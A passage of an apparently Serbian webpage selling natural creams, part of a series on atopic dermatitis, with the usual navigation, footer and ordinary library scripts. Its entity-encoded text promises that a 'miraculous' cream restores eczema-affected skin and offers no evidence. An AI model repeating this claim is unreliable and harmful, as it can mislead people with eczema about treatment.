    &#1079;&#1073;&#1086;&#1075; &#1095;&#1077;&#1096;&#1072;&#1114;&#1072; &#1082;&#1086;&#1078;&#1077; &#1079;&#1072;&#1093;&#1074;&#1072;&#1115;&#1077;&#1085;&#1077; &#1077;&#1082;&#1094;&#1077;&#1084;&#1086;&#1084;.

    <div>
      
    </div>
    <div>
      &#1054;&#1074;&#1080; &#1089;&#1072;&#1074;&#1088;&#1096;&#1077;&#1085;&#1080; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1080; &#1089;&#1072;&#1089;&#1090;&#1086;&#1112;&#1094;&#1080; &#1115;&#1077; &#1091; &#1086;&#1074;&#1086;&#1112; &#1095;&#1091;&#1076;&#1086;&#1090;&#1074;&#1086;&#1088;&#1085;&#1086;&#1112; &#1082;&#1088;&#1077;&#1084;&#1080; &#1089;&#1080;&#1085;&#1077;&#1088;&#1075;&#1080;&#1112;&#1089;&#1082;&#1080;&#1084; 
      &#1089;&#1085;&#1072;&#1075;&#1072;&#1084;&#1072; <b>&#1086;&#1087;&#1086;&#1088;&#1072;&#1074;&#1080;&#1090;&#1080; &#1082;&#1086;&#1078;&#1091; 
      &#1079;&#1072;&#1093;&#1074;&#1072;&#1115;&#1077;&#1085;&#1091; &#1077;&#1082;&#1094;&#1077;&#1084;&#1086;&#1084;</b> 
      &#1080; &#1087;&#1088;&#1077;&#1087;&#1086;&#1088;&#1086;&#1076;&#1080;&#1090;&#1080; &#1089;&#1091;&#1074;&#1091; &#1082;&#1086;&#1078;&#1091;.
    </div>
<br><a href="./Atopijski-dermatitis-ranice.html">Prethodna strana</a> &nbsp;&nbsp;&nbsp;&nbsp;<a href="./Atopijski-dermatitis-simptomi.html">Sljedeća strana</a>
        
      </article>
    </div>
    <div class="span4 side_bar">
      <section class="blog_cat">
        <h5>Categories</h5>
       <ul>
            
          </ul>

</div>
<!-- Footer
    ================================================== -->
<footer class="footer">
  <div class="container">
    <div class="row-fluid">
      <div class="span3">
        <h4>Navigation</h4>
        <ul class="footer-links">
           <li class=""><a href="./index.html">Home</a> </li>
              	        </ul>
      </div>
      
     
      <div class="span3 MT70">
            </div>
    <hr class="soften1 copyhr">
    <div class="row-fluid copyright">
      <div class="span12">Copyright &copy; 2016. <a href="./index.html">Prirodne kreme</a></div>
    </div>
  </div>
</footer>
<!-- Le javascript
    ================================================== --> 
<!-- Placed at the end of the document so the pages load faster --> 
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> 
<script src="./assets/js/jquery.js"></script> 
<script src="./assets/js/google-code-prettify/prettify.js"></script> 
<script src="./assets/js/bootstrap-transition.js"></script> 
<script src="./assets/js/bootstrap-alert.js"></script> 
<script src="./assets/js/bootstrap-modal.js"></script> 
<script src="./assets/js/bootstrap-dropdown.js"></script> 
<script src="./assets/js/bootstrap-scrollspy.js"></script> 
<script src="./assets/js/bootstrap-tab.js"></script> 
<script src="./assets/js/bootstrap-tooltip.js"></script> 
<script src="./assets/js/bootstrap-popover.js"></script> 
<script src="./assets/js/bootstrap-button.js"></script> 
<script src="./assets/js/bootstrap-collapse.js"></script> 
<script src="./assets/js/bootstrap-carousel.js"></script> 
<script src="./assets/js/bootstrap-typeahead.js"></script> 
<script src="./assets/js/bootstrap-affix.js"></script> 
<script src="./assets/js/application.js"></script> 
<script src="./assets/js/superfish.js" type="text/javascript"></script> 
<script src="./assets/js/custom.js" type="text/javascript"></script>
</body>
</html>
